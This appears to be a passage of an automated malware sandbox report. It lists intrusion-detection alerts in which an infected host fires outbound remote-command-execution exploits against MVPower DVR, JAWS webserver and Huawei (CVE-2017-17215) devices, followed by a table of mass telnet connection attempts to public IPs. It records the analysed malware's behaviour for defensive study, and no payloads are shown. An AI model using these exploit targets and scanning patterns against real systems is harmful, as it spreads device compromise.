                                                          192.168.2.23185.164.6.4838734802025883 01/02/24-06:23:54.914292TCP2025883ET EXPLOIT MVPower DVR Shell UCE3873480192.168.2.23185.164.6.48
                                                          192.168.2.23202.43.100.11357888802030092 01/02/24-06:24:43.056570TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5788880192.168.2.23202.43.100.113
                                                          192.168.2.23173.242.127.8135322802030092 01/02/24-06:25:25.176699TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3532280192.168.2.23173.242.127.81
                                                          192.168.2.2350.19.25.18857882802025883 01/02/24-06:24:17.916928TCP2025883ET EXPLOIT MVPower DVR Shell UCE5788280192.168.2.2350.19.25.188
                                                          192.168.2.23186.132.17.22347340802025883 01/02/24-06:24:18.726816TCP2025883ET EXPLOIT MVPower DVR Shell UCE4734080192.168.2.23186.132.17.223
                                                          192.168.2.23156.235.102.7249608372152835222 01/02/24-06:25:03.497048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960837215192.168.2.23156.235.102.72
                                                          192.168.2.2352.218.179.4559110802025883 01/02/24-06:25:34.705547TCP2025883ET EXPLOIT MVPower DVR Shell UCE5911080192.168.2.2352.218.179.45
                                                          192.168.2.23191.82.53.4348036802025883 01/02/24-06:24:27.438039TCP2025883ET EXPLOIT MVPower DVR Shell UCE4803680192.168.2.23191.82.53.43
                                                          192.168.2.23220.134.218.24855228802025883 01/02/24-06:23:51.508732TCP2025883ET EXPLOIT MVPower DVR Shell UCE5522880192.168.2.23220.134.218.248
                                                          192.168.2.2352.50.137.22941178802030092 01/02/24-06:24:03.282074TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4117880192.168.2.2352.50.137.229
                                                          192.168.2.2346.101.108.16542208802025883 01/02/24-06:24:24.183226TCP2025883ET EXPLOIT MVPower DVR Shell UCE4220880192.168.2.2346.101.108.165
                                                          192.168.2.2323.55.68.9857508802025883 01/02/24-06:25:29.993837TCP2025883ET EXPLOIT MVPower DVR Shell UCE5750880192.168.2.2323.55.68.98
                                                          192.168.2.2389.31.76.4547048802025883 01/02/24-06:24:08.904729TCP2025883ET EXPLOIT MVPower DVR Shell UCE4704880192.168.2.2389.31.76.45
                                                          192.168.2.2334.196.134.24735922802025883 01/02/24-06:25:34.999781TCP2025883ET EXPLOIT MVPower DVR Shell UCE3592280192.168.2.2334.196.134.247
                                                          192.168.2.23125.229.151.23948022802030092 01/02/24-06:23:54.655329TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4802280192.168.2.23125.229.151.239
                                                          192.168.2.23121.11.37.23456708802030092 01/02/24-06:24:50.567237TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5670880192.168.2.23121.11.37.234
                                                          192.168.2.23117.20.101.12541464802030092 01/02/24-06:24:32.881657TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4146480192.168.2.23117.20.101.125
                                                          192.168.2.23146.75.63.13352912802030092 01/02/24-06:23:55.171237TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5291280192.168.2.23146.75.63.133
                                                          192.168.2.23108.186.112.3448840802030092 01/02/24-06:24:54.992165TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4884080192.168.2.23108.186.112.34
                                                          192.168.2.23121.143.178.8245268802030092 01/02/24-06:25:22.174762TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4526880192.168.2.23121.143.178.82
                                                          192.168.2.2335.187.108.16953570802030092 01/02/24-06:25:21.019391TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5357080192.168.2.2335.187.108.169
                                                          192.168.2.23190.167.115.16244810802025883 01/02/24-06:23:55.091590TCP2025883ET EXPLOIT MVPower DVR Shell UCE4481080192.168.2.23190.167.115.162
                                                          192.168.2.2318.67.147.1742596802025883 01/02/24-06:25:34.896348TCP2025883ET EXPLOIT MVPower DVR Shell UCE4259680192.168.2.2318.67.147.17
                                                          192.168.2.2331.30.58.13333052802025883 01/02/24-06:24:10.909503TCP2025883ET EXPLOIT MVPower DVR Shell UCE3305280192.168.2.2331.30.58.133
                                                          192.168.2.23104.230.152.22549862802025883 01/02/24-06:24:23.652013TCP2025883ET EXPLOIT MVPower DVR Shell UCE4986280192.168.2.23104.230.152.225
                                                          192.168.2.2354.179.83.5233844802025883 01/02/24-06:25:04.468216TCP2025883ET EXPLOIT MVPower DVR Shell UCE3384480192.168.2.2354.179.83.52
                                                          192.168.2.2384.247.28.15551342802030092 01/02/24-06:24:08.653606TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5134280192.168.2.2384.247.28.155
                                                          192.168.2.23213.29.227.25034468802030092 01/02/24-06:24:19.265733TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3446880192.168.2.23213.29.227.250
                                                          192.168.2.2351.138.221.22455554802025883 01/02/24-06:25:00.997015TCP2025883ET EXPLOIT MVPower DVR Shell UCE5555480192.168.2.2351.138.221.224
                                                          192.168.2.23154.219.183.10247752802030092 01/02/24-06:25:34.822358TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4775280192.168.2.23154.219.183.102
                                                          192.168.2.23220.137.212.6059920802030092 01/02/24-06:25:15.748234TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5992080192.168.2.23220.137.212.60
                                                          192.168.2.2352.24.96.4456028802025883 01/02/24-06:25:04.184391TCP2025883ET EXPLOIT MVPower DVR Shell UCE5602880192.168.2.2352.24.96.44
                                                          192.168.2.2398.123.179.9836228802030092 01/02/24-06:24:08.556843TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3622880192.168.2.2398.123.179.98
                                                          192.168.2.23154.218.175.19054758802025883 01/02/24-06:25:06.948021TCP2025883ET EXPLOIT MVPower DVR Shell UCE5475880192.168.2.23154.218.175.190
                                                          192.168.2.2323.14.39.9148702802025883 01/02/24-06:25:37.988872TCP2025883ET EXPLOIT MVPower DVR Shell UCE4870280192.168.2.2323.14.39.91
                                                          192.168.2.23208.109.68.2335052802025883 01/02/24-06:25:09.832341TCP2025883ET EXPLOIT MVPower DVR Shell UCE3505280192.168.2.23208.109.68.23
                                                          192.168.2.2352.204.79.20242440802025883 01/02/24-06:25:11.888955TCP2025883ET EXPLOIT MVPower DVR Shell UCE4244080192.168.2.2352.204.79.202
                                                          192.168.2.2335.183.50.13935316802025883 01/02/24-06:25:42.350384TCP2025883ET EXPLOIT MVPower DVR Shell UCE3531680192.168.2.2335.183.50.139
                                                          192.168.2.23104.97.11.2460650802025883 01/02/24-06:25:22.089353TCP2025883ET EXPLOIT MVPower DVR Shell UCE6065080192.168.2.23104.97.11.24
                                                          192.168.2.23121.11.37.23456696802025883 01/02/24-06:24:50.251380TCP2025883ET EXPLOIT MVPower DVR Shell UCE5669680192.168.2.23121.11.37.234
                                                          192.168.2.2352.1.227.24732976802030092 01/02/24-06:25:31.234449TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3297680192.168.2.2352.1.227.247
                                                          192.168.2.23103.141.149.9046528802030092 01/02/24-06:24:19.516603TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4652880192.168.2.23103.141.149.90
                                                          192.168.2.23185.204.186.16245770802025883 01/02/24-06:24:24.014425TCP2025883ET EXPLOIT MVPower DVR Shell UCE4577080192.168.2.23185.204.186.162
                                                          192.168.2.23201.192.158.13039898802030092 01/02/24-06:25:34.727412TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3989880192.168.2.23201.192.158.130
                                                          192.168.2.2390.79.11.6051570802030092 01/02/24-06:25:21.019509TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5157080192.168.2.2390.79.11.60
                                                          192.168.2.23207.60.214.5343892802025883 01/02/24-06:23:58.146252TCP2025883ET EXPLOIT MVPower DVR Shell UCE4389280192.168.2.23207.60.214.53
                                                          192.168.2.23173.255.250.6148452802025883 01/02/24-06:24:17.602391TCP2025883ET EXPLOIT MVPower DVR Shell UCE4845280192.168.2.23173.255.250.61
                                                          192.168.2.2334.206.169.21634808802030092 01/02/24-06:25:00.915047TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3480880192.168.2.2334.206.169.216
                                                          192.168.2.232.21.224.12652276802025883 01/02/24-06:25:16.010358TCP2025883ET EXPLOIT MVPower DVR Shell UCE5227680192.168.2.232.21.224.126
                                                          192.168.2.2352.68.208.13645118802030092 01/02/24-06:25:29.707548TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4511880192.168.2.2352.68.208.136
                                                          192.168.2.2313.236.88.18038176802025883 01/02/24-06:25:14.749773TCP2025883ET EXPLOIT MVPower DVR Shell UCE3817680192.168.2.2313.236.88.180
                                                          192.168.2.2313.127.14.18542886802025883 01/02/24-06:24:41.189472TCP2025883ET EXPLOIT MVPower DVR Shell UCE4288680192.168.2.2313.127.14.185
                                                          192.168.2.23143.208.250.1143668802025883 01/02/24-06:25:10.207227TCP2025883ET EXPLOIT MVPower DVR Shell UCE4366880192.168.2.23143.208.250.11
                                                          192.168.2.2385.50.165.3759160802025883 01/02/24-06:24:24.106651TCP2025883ET EXPLOIT MVPower DVR Shell UCE5916080192.168.2.2385.50.165.37
                                                          192.168.2.23146.75.21.14359376802030092 01/02/24-06:24:45.316760TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5937680192.168.2.23146.75.21.143
                                                          192.168.2.2313.249.87.5444040802025883 01/02/24-06:24:23.621355TCP2025883ET EXPLOIT MVPower DVR Shell UCE4404080192.168.2.2313.249.87.54
                                                          192.168.2.23198.44.232.13837024802030092 01/02/24-06:25:43.163000TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3702480192.168.2.23198.44.232.138
                                                          192.168.2.23202.81.229.16957854802030092 01/02/24-06:24:05.844790TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5785480192.168.2.23202.81.229.169
                                                          192.168.2.23104.93.2.11952484802030092 01/02/24-06:24:52.173461TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5248480192.168.2.23104.93.2.119
                                                          192.168.2.2338.181.35.21934152802025883 01/02/24-06:23:55.217292TCP2025883ET EXPLOIT MVPower DVR Shell UCE3415280192.168.2.2338.181.35.219
                                                          192.168.2.23205.164.12.22246902802030092 01/02/24-06:24:20.042564TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4690280192.168.2.23205.164.12.222
                                                          192.168.2.2343.139.38.17550990802030092 01/02/24-06:24:04.154188TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5099080192.168.2.2343.139.38.175
                                                          192.168.2.23103.21.117.2251812802030092 01/02/24-06:25:22.210601TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5181280192.168.2.23103.21.117.22
                                                          192.168.2.23208.109.173.19843616802025883 01/02/24-06:25:34.668261TCP2025883ET EXPLOIT MVPower DVR Shell UCE4361680192.168.2.23208.109.173.198
                                                          192.168.2.23172.98.133.4651318802025883 01/02/24-06:25:21.231178TCP2025883ET EXPLOIT MVPower DVR Shell UCE5131880192.168.2.23172.98.133.46
                                                          192.168.2.2334.233.79.10139524802025883 01/02/24-06:24:40.913375TCP2025883ET EXPLOIT MVPower DVR Shell UCE3952480192.168.2.2334.233.79.101
                                                          192.168.2.2399.80.176.12533828802030092 01/02/24-06:25:00.994557TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3382880192.168.2.2399.80.176.125
                                                          192.168.2.2323.216.114.4945924802030092 01/02/24-06:25:10.067215TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4592480192.168.2.2323.216.114.49
                                                          192.168.2.2338.132.215.4440936802025883 01/02/24-06:24:13.920460TCP2025883ET EXPLOIT MVPower DVR Shell UCE4093680192.168.2.2338.132.215.44
                                                          192.168.2.2352.29.37.5835934802025883 01/02/24-06:25:21.265685TCP2025883ET EXPLOIT MVPower DVR Shell UCE3593480192.168.2.2352.29.37.58
                                                          192.168.2.23167.73.14.8833056802030092 01/02/24-06:24:23.650284TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3305680192.168.2.23167.73.14.88
                                                          192.168.2.23118.99.59.24958056802030092 01/02/24-06:24:31.063069TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5805680192.168.2.23118.99.59.249
                                                          192.168.2.23156.234.219.23440728802030092 01/02/24-06:25:19.115031TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4072880192.168.2.23156.234.219.234
                                                          192.168.2.2352.218.234.14751138802030092 01/02/24-06:25:02.194486TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5113880192.168.2.2352.218.234.147
                                                          192.168.2.23107.158.48.17360248802030092 01/02/24-06:25:24.657251TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6024880192.168.2.23107.158.48.173
                                                          192.168.2.23121.4.183.14448996802030092 01/02/24-06:25:19.173099TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4899680192.168.2.23121.4.183.144
                                                          192.168.2.23197.26.81.356728802025883 01/02/24-06:24:49.038851TCP2025883ET EXPLOIT MVPower DVR Shell UCE5672880192.168.2.23197.26.81.3
                                                          192.168.2.2318.169.231.14560782802030092 01/02/24-06:24:54.905175TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6078280192.168.2.2318.169.231.145
                                                          192.168.2.23185.114.245.25152468802025883 01/02/24-06:25:19.107884TCP2025883ET EXPLOIT MVPower DVR Shell UCE5246880192.168.2.23185.114.245.251
                                                          192.168.2.23184.85.129.25155542802030092 01/02/24-06:24:01.334668TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5554280192.168.2.23184.85.129.251
                                                          192.168.2.2354.199.121.17058798802030092 01/02/24-06:24:19.269485TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5879880192.168.2.2354.199.121.170
                                                          192.168.2.23104.69.218.3453078802025883 01/02/24-06:24:30.590605TCP2025883ET EXPLOIT MVPower DVR Shell UCE5307880192.168.2.23104.69.218.34
                                                          192.168.2.23209.51.136.5541670802025883 01/02/24-06:25:42.872171TCP2025883ET EXPLOIT MVPower DVR Shell UCE4167080192.168.2.23209.51.136.55
                                                          192.168.2.2338.239.158.19649628802025883 01/02/24-06:24:03.470698TCP2025883ET EXPLOIT MVPower DVR Shell UCE4962880192.168.2.2338.239.158.196
                                                          192.168.2.23202.238.204.21040470802025883 01/02/24-06:24:24.201458TCP2025883ET EXPLOIT MVPower DVR Shell UCE4047080192.168.2.23202.238.204.210
                                                          192.168.2.23185.179.157.10256368802030092 01/02/24-06:24:10.926344TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5636880192.168.2.23185.179.157.102
                                                          192.168.2.2318.208.8.11543682802025883 01/02/24-06:25:15.875600TCP2025883ET EXPLOIT MVPower DVR Shell UCE4368280192.168.2.2318.208.8.115
                                                          192.168.2.23168.93.163.14643476802030092 01/02/24-06:24:30.901528TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4347680192.168.2.23168.93.163.146
                                                          192.168.2.23156.241.14.15348512372152835222 01/02/24-06:23:49.692230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4851237215192.168.2.23156.241.14.153
                                                          192.168.2.2394.250.243.644720802025883 01/02/24-06:24:27.687612TCP2025883ET EXPLOIT MVPower DVR Shell UCE4472080192.168.2.2394.250.243.6
                                                          192.168.2.2344.237.111.25343424802030092 01/02/24-06:23:59.006301TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4342480192.168.2.2344.237.111.253
                                                          192.168.2.2337.221.198.8650826802025883 01/02/24-06:25:24.777893TCP2025883ET EXPLOIT MVPower DVR Shell UCE5082680192.168.2.2337.221.198.86
                                                          192.168.2.2385.126.165.10351920802030092 01/02/24-06:25:29.714738TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5192080192.168.2.2385.126.165.103
                                                          192.168.2.2323.50.91.16934304802025883 01/02/24-06:25:25.361156TCP2025883ET EXPLOIT MVPower DVR Shell UCE3430480192.168.2.2323.50.91.169
                                                          192.168.2.23211.253.8.10738410802030092 01/02/24-06:25:02.050528TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3841080192.168.2.23211.253.8.107
                                                          192.168.2.23121.128.130.643932802030092 01/02/24-06:24:56.157594TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4393280192.168.2.23121.128.130.6
                                                          192.168.2.23122.219.208.9451858802025883 01/02/24-06:25:29.715016TCP2025883ET EXPLOIT MVPower DVR Shell UCE5185880192.168.2.23122.219.208.94
                                                          192.168.2.2334.203.180.1341426802030092 01/02/24-06:24:04.156700TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4142680192.168.2.2334.203.180.13
                                                          192.168.2.2337.1.204.6437102802025883 01/02/24-06:25:29.908844TCP2025883ET EXPLOIT MVPower DVR Shell UCE3710280192.168.2.2337.1.204.64
                                                          192.168.2.2347.90.200.13459390802025883 01/02/24-06:24:08.717627TCP2025883ET EXPLOIT MVPower DVR Shell UCE5939080192.168.2.2347.90.200.134
                                                          192.168.2.2371.80.219.1554798802030092 01/02/24-06:24:23.996859TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5479880192.168.2.2371.80.219.15
                                                          192.168.2.23148.231.244.9739988802030092 01/02/24-06:24:58.640723TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3998880192.168.2.23148.231.244.97
                                                          192.168.2.23154.38.247.12652462802030092 01/02/24-06:25:06.911219TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5246280192.168.2.23154.38.247.126
                                                          192.168.2.2323.221.123.6153238802030092 01/02/24-06:25:30.014297TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5323880192.168.2.2323.221.123.61
                                                          192.168.2.2382.163.53.1537476802025883 01/02/24-06:24:23.976596TCP2025883ET EXPLOIT MVPower DVR Shell UCE3747680192.168.2.2382.163.53.15
                                                          192.168.2.2343.192.122.6537710802030092 01/02/24-06:25:42.873893TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3771080192.168.2.2343.192.122.65
                                                          192.168.2.23172.245.174.8046628802025883 01/02/24-06:24:17.912872TCP2025883ET EXPLOIT MVPower DVR Shell UCE4662880192.168.2.23172.245.174.80
                                                          192.168.2.2354.211.17.19052204802030092 01/02/24-06:23:51.955510TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5220480192.168.2.2354.211.17.190
                                                          192.168.2.2334.160.79.11940184802030092 01/02/24-06:25:43.999253TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4018480192.168.2.2334.160.79.119
                                                          192.168.2.2338.173.201.9140430802030092 01/02/24-06:24:30.753564TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4043080192.168.2.2338.173.201.91
                                                          192.168.2.2323.78.13.16036348802025883 01/02/24-06:23:58.964776TCP2025883ET EXPLOIT MVPower DVR Shell UCE3634880192.168.2.2323.78.13.160
                                                          192.168.2.2393.241.196.4942544802030092 01/02/24-06:24:43.250963TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4254480192.168.2.2393.241.196.49
                                                          192.168.2.23185.214.242.16237540802030092 01/02/24-06:24:49.039118TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3754080192.168.2.23185.214.242.162
                                                          192.168.2.2380.15.65.10050756802030092 01/02/24-06:24:55.923121TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5075680192.168.2.2380.15.65.100
                                                          192.168.2.23213.92.76.14950818802030092 01/02/24-06:25:32.164890TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5081880192.168.2.23213.92.76.149
                                                          192.168.2.2318.133.47.14241080802025883 01/02/24-06:25:11.803956TCP2025883ET EXPLOIT MVPower DVR Shell UCE4108080192.168.2.2318.133.47.142
                                                          192.168.2.2334.107.164.6038972802030092 01/02/24-06:24:27.400912TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3897280192.168.2.2334.107.164.60
                                                          192.168.2.2370.121.13.460866802030092 01/02/24-06:24:27.470721TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6086680192.168.2.2370.121.13.4
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 2, 2024 06:23:41.177727938 CET1426523192.168.2.23125.99.61.248
                                                          Jan 2, 2024 06:23:41.177761078 CET1426523192.168.2.23188.31.132.249
                                                          Jan 2, 2024 06:23:41.177777052 CET1426523192.168.2.23218.104.120.155
                                                          Jan 2, 2024 06:23:41.177777052 CET1426523192.168.2.23109.22.76.238
                                                          Jan 2, 2024 06:23:41.177783012 CET1426523192.168.2.23105.222.161.47
                                                          Jan 2, 2024 06:23:41.177783012 CET1426523192.168.2.2336.250.94.164
                                                          Jan 2, 2024 06:23:41.177783012 CET1426523192.168.2.2336.220.206.248
                                                          Jan 2, 2024 06:23:41.177783012 CET1426523192.168.2.2375.153.38.249
                                                          Jan 2, 2024 06:23:41.177783012 CET1426523192.168.2.23121.124.157.78
                                                          Jan 2, 2024 06:23:41.177787066 CET1426523192.168.2.23151.2.244.36
                                                          Jan 2, 2024 06:23:41.177783012 CET1426523192.168.2.2363.35.22.70
                                                          Jan 2, 2024 06:23:41.177789927 CET1426523192.168.2.23212.10.55.138
                                                          Jan 2, 2024 06:23:41.177789927 CET1426523192.168.2.2313.136.36.95
                                                          Jan 2, 2024 06:23:41.177809954 CET1426523192.168.2.23195.61.104.203
                                                          Jan 2, 2024 06:23:41.177810907 CET1426523192.168.2.23171.117.55.103
                                                          Jan 2, 2024 06:23:41.177820921 CET1426523192.168.2.23200.121.211.201
                                                          Jan 2, 2024 06:23:41.177820921 CET1426523192.168.2.23217.3.114.143
                                                          Jan 2, 2024 06:23:41.177825928 CET1426523192.168.2.23157.151.175.28
                                                          Jan 2, 2024 06:23:41.177825928 CET1426523192.168.2.23175.235.90.206
                                                          Jan 2, 2024 06:23:41.177829027 CET1426523192.168.2.23196.63.2.211
                                                          Jan 2, 2024 06:23:41.177844048 CET1426523192.168.2.23183.5.71.160
                                                          Jan 2, 2024 06:23:41.177844048 CET1426523192.168.2.2373.0.223.77
                                                          Jan 2, 2024 06:23:41.177844048 CET1426523192.168.2.23180.87.155.99
                                                          Jan 2, 2024 06:23:41.177848101 CET1426523192.168.2.2314.146.51.250
                                                          Jan 2, 2024 06:23:41.177853107 CET1426523192.168.2.23162.100.78.199
                                                          Jan 2, 2024 06:23:41.177859068 CET1426523192.168.2.2381.79.88.136
                                                          Jan 2, 2024 06:23:41.177892923 CET1426523192.168.2.2365.131.253.201
                                                          Jan 2, 2024 06:23:41.177892923 CET1426523192.168.2.23148.169.158.142
                                                          Jan 2, 2024 06:23:41.177896023 CET1426523192.168.2.2392.120.142.194
                                                          Jan 2, 2024 06:23:41.177901983 CET1426523192.168.2.2345.75.3.207
                                                          Jan 2, 2024 06:23:41.177903891 CET1426523192.168.2.23151.112.118.249
                                                          Jan 2, 2024 06:23:41.177908897 CET1426523192.168.2.23114.101.118.217
                                                          Jan 2, 2024 06:23:41.177925110 CET1426523192.168.2.23123.185.9.87
                                                          Jan 2, 2024 06:23:41.177925110 CET1426523192.168.2.23130.64.97.224
                                                          Jan 2, 2024 06:23:41.177942038 CET1426523192.168.2.23126.234.158.13
                                                          Jan 2, 2024 06:23:41.177942038 CET1426523192.168.2.23211.107.200.145
                                                          Jan 2, 2024 06:23:41.177948952 CET1426523192.168.2.23162.136.80.202
                                                          Jan 2, 2024 06:23:41.177952051 CET1426523192.168.2.23213.195.173.61
                                                          Jan 2, 2024 06:23:41.178030014 CET1426523192.168.2.2312.139.160.245
                                                          Jan 2, 2024 06:23:41.178030968 CET1426523192.168.2.238.160.32.239
                                                          Jan 2, 2024 06:23:41.178034067 CET1426523192.168.2.23182.44.138.73
                                                          Jan 2, 2024 06:23:41.178036928 CET1426523192.168.2.23189.130.103.99
                                                          Jan 2, 2024 06:23:41.178036928 CET1426523192.168.2.23122.215.41.204
                                                          Jan 2, 2024 06:23:41.178036928 CET1426523192.168.2.2340.102.4.26
                                                          Jan 2, 2024 06:23:41.178039074 CET1426523192.168.2.23189.61.2.65
                                                          Jan 2, 2024 06:23:41.178039074 CET1426523192.168.2.23101.119.237.226
                                                          Jan 2, 2024 06:23:41.178041935 CET1426523192.168.2.23103.131.218.58
                                                          Jan 2, 2024 06:23:41.178041935 CET1426523192.168.2.23155.168.79.64
                                                          Jan 2, 2024 06:23:41.178049088 CET1426523192.168.2.23203.127.143.44
                                                          Jan 2, 2024 06:23:41.178052902 CET1426523192.168.2.23103.233.38.136
                                                          Jan 2, 2024 06:23:41.178052902 CET1426523192.168.2.2319.5.47.213
                                                          Jan 2, 2024 06:23:41.178052902 CET1426523192.168.2.23187.111.252.105
                                                          Jan 2, 2024 06:23:41.178055048 CET1426523192.168.2.2338.187.15.233
                                                          Jan 2, 2024 06:23:41.178055048 CET1426523192.168.2.2353.112.138.107
                                                          Jan 2, 2024 06:23:41.178055048 CET1426523192.168.2.2327.44.220.42
                                                          Jan 2, 2024 06:23:41.178060055 CET1426523192.168.2.2382.118.175.79
                                                          Jan 2, 2024 06:23:41.178061008 CET1426523192.168.2.23159.43.73.32
                                                          Jan 2, 2024 06:23:41.178076029 CET1426523192.168.2.239.184.16.183
                                                          Jan 2, 2024 06:23:41.178076029 CET1426523192.168.2.23216.35.60.122
                                                          Jan 2, 2024 06:23:41.178086042 CET1426523192.168.2.23108.85.100.221
                                                          Jan 2, 2024 06:23:41.178086996 CET1426523192.168.2.23190.37.206.193
                                                          Jan 2, 2024 06:23:41.178088903 CET1426523192.168.2.23195.221.59.165
                                                          Jan 2, 2024 06:23:41.178088903 CET1426523192.168.2.2382.105.114.210
                                                          Jan 2, 2024 06:23:41.178090096 CET1426523192.168.2.23141.142.124.66
                                                          Jan 2, 2024 06:23:41.178090096 CET1426523192.168.2.2319.45.138.66
                                                          Jan 2, 2024 06:23:41.178090096 CET1426523192.168.2.2395.37.250.96
                                                          Jan 2, 2024 06:23:41.178091049 CET1426523192.168.2.23153.34.112.19
                                                          Jan 2, 2024 06:23:41.178090096 CET1426523192.168.2.23180.244.89.182
                                                          Jan 2, 2024 06:23:41.178090096 CET1426523192.168.2.2339.246.71.113
                                                          Jan 2, 2024 06:23:41.178090096 CET1426523192.168.2.23211.192.122.136
                                                          Jan 2, 2024 06:23:41.178093910 CET1426523192.168.2.2352.71.43.37
                                                          Jan 2, 2024 06:23:41.178093910 CET1426523192.168.2.2365.33.154.23
                                                          Jan 2, 2024 06:23:41.178102016 CET1426523192.168.2.2397.3.240.132
                                                          Jan 2, 2024 06:23:41.178107977 CET1426523192.168.2.23160.41.144.59
                                                          Jan 2, 2024 06:23:41.178107977 CET1426523192.168.2.2358.172.40.217
                                                          Jan 2, 2024 06:23:41.178107977 CET1426523192.168.2.2362.18.86.111
                                                          Jan 2, 2024 06:23:41.178112984 CET1426523192.168.2.239.30.211.87
                                                          Jan 2, 2024 06:23:41.178112984 CET1426523192.168.2.23103.45.36.49
                                                          Jan 2, 2024 06:23:41.178112984 CET1426523192.168.2.2319.118.126.122
                                                          Jan 2, 2024 06:23:41.178112984 CET1426523192.168.2.23103.33.93.121
                                                          Jan 2, 2024 06:23:41.178112984 CET1426523192.168.2.23206.126.119.76
                                                          Jan 2, 2024 06:23:41.178119898 CET1426523192.168.2.2397.197.8.207
                                                          Jan 2, 2024 06:23:41.178119898 CET1426523192.168.2.232.83.120.166
                                                          Jan 2, 2024 06:23:41.178122044 CET1426523192.168.2.2336.132.177.152
                                                          Jan 2, 2024 06:23:41.178122044 CET1426523192.168.2.23186.65.48.124
                                                          Jan 2, 2024 06:23:41.178122044 CET1426523192.168.2.2395.33.65.29
                                                          Jan 2, 2024 06:23:41.178122044 CET1426523192.168.2.23103.151.21.185
                                                          Jan 2, 2024 06:23:41.178123951 CET1426523192.168.2.23217.150.144.252
                                                          Jan 2, 2024 06:23:41.178123951 CET1426523192.168.2.2390.224.198.194
                                                          Jan 2, 2024 06:23:41.178126097 CET1426523192.168.2.23107.81.102.73
                                                          Jan 2, 2024 06:23:41.178126097 CET1426523192.168.2.2344.190.9.115
                                                          Jan 2, 2024 06:23:41.178126097 CET1426523192.168.2.2369.21.120.244
                                                          Jan 2, 2024 06:23:41.178137064 CET1426523192.168.2.23219.216.209.60
                                                          Jan 2, 2024 06:23:41.178137064 CET1426523192.168.2.2332.65.229.168
                                                          Jan 2, 2024 06:23:41.178141117 CET1426523192.168.2.2371.156.254.162
                                                          Jan 2, 2024 06:23:41.178139925 CET1426523192.168.2.23109.19.164.251
                                                          Jan 2, 2024 06:23:41.178141117 CET1426523192.168.2.23150.83.95.57
                                                          Jan 2, 2024 06:23:41.178142071 CET1426523192.168.2.23163.126.90.173
                                                          Jan 2, 2024 06:23:41.178143024 CET1426523192.168.2.23166.176.240.235
                                                          Jan 2, 2024 06:23:41.178143024 CET1426523192.168.2.23104.231.6.178
                                                          Jan 2, 2024 06:23:41.178143978 CET1426523192.168.2.2335.133.160.132
                                                          Jan 2, 2024 06:23:41.178143024 CET1426523192.168.2.23113.143.97.44
                                                          Jan 2, 2024 06:23:41.178143978 CET1426523192.168.2.2376.83.8.111
